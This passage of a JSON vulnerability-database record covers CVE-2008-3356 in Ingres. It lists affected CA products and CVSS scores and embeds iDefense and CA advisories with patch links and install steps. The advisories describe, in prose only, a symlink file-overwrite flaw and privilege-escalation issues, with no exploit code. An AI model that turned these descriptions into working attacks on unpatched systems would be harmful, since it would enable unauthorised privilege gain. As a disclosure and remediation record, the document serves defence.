"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates nsm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12"
},
{
"model": "associates etrust audit/scc sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2.1"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.2"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ca arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:ingres",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
}
],
"trust": 0.6
},
"cve": "CVE-2008-3356",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2008-3356",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-3356",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2008-3356",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-048",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "verifydb in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and other Unix platforms sets the ownership or permissions of an iivdb.log file without verifying that it is the application\u0027s own log file, which allows local users to overwrite arbitrary files by creating a symlink with an iivdb.log filename. Ingres Database is prone to multiple local vulnerabilities:\n- Multiple local privilege-escalation vulnerabilities\n- A vulnerability that may allow attackers to overwrite arbitrary files. \nLocal attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by \u0027Ingres\u0027 user. iDefense Security Advisory 08.01.08\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nAug 01, 2008\n\nI. BACKGROUND\n\nIngres Database is a database server used in several Computer\nAssociates\u0027 products. For example, CA Directory Service uses the Ingres\nDatabase server. More information can be found on the vendor\u0027s website\nat the following URL. \n\nhttp://ingres.com/downloads/prod-cert-download.php\n\nII. \n\nThe vulnerability exists within the \"verifydb\" utility included with\nIngres. It is used to cleanup unneeded files created in the database\ndirectory. This program has the set-uid bit set, and is owned by the\n\"ingres\" user. \n\nThe \"verifydb\" program improperly changes the permissions on files. \n\nIII. By itself, this\nvulnerability does not have very serious consequences. \n\nIV. DETECTION\n\niDefense has confirmed the existence of this vulnerability in Ingres\n2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other\nversions may also be affected. \n\nV. WORKAROUND\n\niDefense is currently unaware of any workaround for this issue. \n\nVI. VENDOR RESPONSE\n\n\"This problem has been identified and resolved by Ingres in the\nfollowing releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release\n1 (9.0.4), and Ingres 2.6.\"\n\nFor more information, refer to Ingres\u0027 advisory at the following URL. \n\nhttp://www.ingres.com/support/security-alert-080108.php\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2008-3356 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n07/20/2007 Initial vendor response\n07/23/2007 Initial vendor notification\n08/01/2008 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2008 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \nTitle: CA Products That Embed Ingres Multiple Vulnerabilities\n\n\nCA Advisory Date: 2008-08-01\n\n\nReported By: iDefense Labs\n\n\nImpact: A remote attacker can execute arbitrary code, gain \nprivileges, or cause a denial of service condition. \n\n\nSummary: CA products that embed Ingres contain multiple \nvulnerabilities that can allow a remote attacker to execute \narbitrary code, gain privileges, or cause a denial of service \ncondition. These vulnerabilities exist in the products and on the \nplatforms listed below. These vulnerabilities do not impact any \nWindows-based Ingres installation. The first vulnerability, \nCVE-2008-3356, allows an unauthenticated attacker to potentially \nset the user and/or group ownership of a verifydb log file to be \nIngres allowing read/write permissions to both. The third \nvulnerability, CVE-2008-3389, allows an unauthenticated attacker \nto obtain ingres user privileges. However, when combined with the \nunsecured directory privileges vulnerability (CVE\u20132008-3357), root \nprivileges can be obtained. \n\n\nMitigating Factors: These vulnerabilities do not impact any \nWindows-based Ingres installation. \n\n\nSeverity: CA has given these vulnerabilities a High risk rating. \n\n\nAffected Products:\nAdmin r8.1 SP2\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nCA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3\nCA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nCleverPath Aion BPM r10.1, r10.2\nEEM 8.1, 8.2, 8.2.1\neTrust Audit/SCC 8.0 sp2\nIdentity Manager r12\nNSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11\nUnicenter Asset Management r11.1, r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r2.2, r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2\nUnicenter Software Delivery r11.1, r11.2\nUnicenter Workload Control Center r11\n\n\nAffected Platforms:\n1. Ingres verifydb file create permission override (CVE-2008-3356)\n This vulnerability impacts all platforms except Windows. \n2. Ingres un-secure directory privileges with utility ingvalidpw \n (CVE - 2008-3357)\n This vulnerability impacts only Linux and HP platforms. \n3. Ingres verifydb, iimerge, csreport buffer overflow \n (CVE-2008-3389)\n This vulnerability impacts only Linux and HP platforms. \n\n\nStatus and Recommendation:\nThe most prudent course of action for affected customers is to \ndownload and apply the corrective maintenance. However, updates \nare provided only for the following releases: 2.6 and r3\n\nImportant: Customers using products that embed an earlier version \nof Ingres r3 should upgrade Ingres to the release that is \ncurrently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX \nplatforms) before applying the maintenance updates. Please contact \nyour product\u0027s Technical Support team for more information. \n\nFor these products:\nAdmin r8.1 SP2\nCA ARCserve Backup for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX [3.0.3 (r64.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z\n\nHP-UX Itanium [3.0.3 (i64.hpu/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z\n\nHP-UX RISC [3.0.3 (hp2.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z\n\nLinux AMD [3.0.3 (a64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z\n\nLinux Intel 32bit [3.0.3 (int.lnx/103)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z\n\nLinux Itanium [3.0.3 (i64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z\n\nSolaris SPARC [3.0.3 (su9.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z\n\nSolaris x64/x86 [3.0.3 (a64.sol/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z\n\nIngres r3 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \u2018-m\u0027 \n flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nApply the build below that is listed for your platform (note that \nURLs may wrap):\n\nAIX\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar\n\nHP-UX Itanium\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar\n\nHP-UX RISC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar\n\nLinux AMD EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz\n\nLinux AMD II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz\n\nLinux Intel EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz\n\nLinux Intel II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz\n\nLinux Itanium EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz\n\nLinux Itanium II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz\n\nSolaris SPARC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar\n\nSolaris x64/x86\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar\n\nIngres r3 Build Install Steps (August 1, 2008)\n\nImportant: Prior to installing the build, a full operating system \nbackup of the $II_SYSTEM/ingres directory on Unix/Linux and \n%II_SYSTEM%\\ingres directory on Windows must be taken with Ingres \ncompletely shut down. Also, a backup of any other DATA locations \nthat you may have must be taken, again with Ingres shut down. In \ncase there is a problem with the update install, this allows \nIngres to be restored from the backup. \n\nUnix:\n1. Log in to the system as the installation owner and make sure \n the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres home directory\n 2. PATH must include $II_SYSTEM/ingres/bin and \n $II_SYSTEM/ingres/utility directories\n 3. Add $II_SYSTEM/ingres/lib to the shared library path\n 4. Set TERM to \u2018vt100\u0027 and TERM_INGRES to \u2018vt100fx\u0027\n2. Copy the downloaded update file to the /tmp directory and \n uncompress\n3. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This creates a directory containing the distribution and \n other files. \n4. Stop all applications that may be connected to or using any of \n the files in the Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. Also, copy the \n $II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to \n ensure that the configuration can be restored. \n7. From the root directory of the Ingres installation \n ($II_SYSTEM/ingres), run the following command:\n tar xf /tmp/\u003cupdate_directory\u003e/ingres.tar install\n8. Run the following command:\n install/ingbuild\n9. The initial install screen appears. \n10. In the Distribution medium enter the full path to the \n \u2018ingres.tar\u0027 file (including the file) (See step 4). \n11. Choose PackageInstall from the list of installation options \n and then choose \u2018Stand alone DBMS Server\u0027 from the list of \n packages. Then choose ExpressInstall. \n12. Choose Yes in the pop-up screen and press Enter key. \n The install utility verifies that each component was \n transferred properly from the distribution medium. When this \n is finished (without errors), another pop-up screen for \n setting up the components comes up. \n13. Select Yes and press Enter key to go to the Setup program. \n14. Once the installation is complete, check the \n $II_SYSTEM/ingres/files/install.log for any errors. Also, \n check the $II_SYSTEM/ingres/version.rel file to verify the new \n build is referenced; this should show 3.0.3 for the build. \n15. If there are no errors, then restore the \n $II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files from the copies made \n in step 6 to replace the existing files. \n16. Start Ingres using the \u2018ingstart\u0027 utility:\n ingstart\n17. Upgrade the databases in the installation to the new release \n level:\n upgradedb -all\n\nLinux:\n1. Log on to the machine as \u2018root\u0027. \n2. Copy the downloaded build update file and to a previously \n chosen directory and uncompress. \n3. Read in the update file with the following command:\n tar xf [update file]\n This creates a directory containing rpm packages for all of \n the Ingres tools. \n4. Shut down any non-Ingres application(s) that may be connected \n to or using any of the files in the specified Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. \n7. From the directory that was created in step 3, install the \n update rpms with the following command:\n rpm \u2013Uvh *.rpm\n If the following error is seen for either the \n \u2018ca-ingres-documentation-3.0.3-103\u0027, the \n \u2018ca-ingres-CATOSL-3.0.3-103\u0027 or the \n \u2018ca-cs-utils-11.0.04348-0000\u0027 (or all of them) packages,\n remove them from the directory containing the rpms and \n re-run the above command:\n package \u003cpackage-name\u003e is already installed\n8. If the installation finishes successfully, then log on as \n \u2018ingres\u0027 to the machine and start Ingres using the \u2018ingstart\u0027 \n utility:\n ingstart\n9. Upgrade \u2018mdb\u0027 database with the following command:\n upgradedb -all\n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter ServicePlus Service Desk 6.0\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX 32bit [2.6/xxxx (rs4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z\n\nAIX 64bit [2.6/xxxx (r64.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z\n\nHP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3\nhttps://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n\nHP-UX Itanium [2.6/xxxx (i64.hpu/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z\n\nHP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z\n\nHP Tru64 UNIX [2.6/xxxx (axp.osf/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z\n\nLinux AMD64 [2.6/xxxx (a64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)LFS]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z\n\nLinux Itanium [2.6/xxxx (i64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z\n\nLinux S/390 [2.6/xxxx (ibm.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z\n\nSolaris SPARC 32bit [2.6/xxxx (su4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z\n\nSolaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z\n\nSolaris SPARC 64bit [2.6/xxxx (su9.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z\n\nIngres 2.6 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \n \u2018-m\u0027 flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\n\nHow to determine if you are affected:\n\nFor these products:\nAdmin r8.1 SP2\nARCserve for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nNotes:\n1. You would need to install the Ingres build instead of the patch \n if either of the following is true:\n 1. If the Ingres release for your platform is not 3.0.3 in \n the release identifier\n or\n 2. The Ingres release is 3.0.3 but the build level is not \n 103 for Linux and 211 for all the Unix platforms. \n If either of the above is true then download and apply the \n latest build for your operating system(s). \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nThe maintenance updates are provided for the latest r3 builds \nsupported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX \nplatforms). If the build embedded is earlier than 3.0.3, it has \nto be upgraded to 3.0.3 to fix the vulnerabilities. \n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nImportant:\nFor Linux (AMD, Intel and Itanium) platforms, after applying the \nbuild provided on this page, please download and apply the \nmaintenance update. For the other platforms, the builds are \npatched to the latest maintenance update. \nNote:\n1. If the release you are using is already 3.0.3 build 103 on \n Linux and 3.0.3 build 211 on Unix, then download and install \n the maintenance update. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter 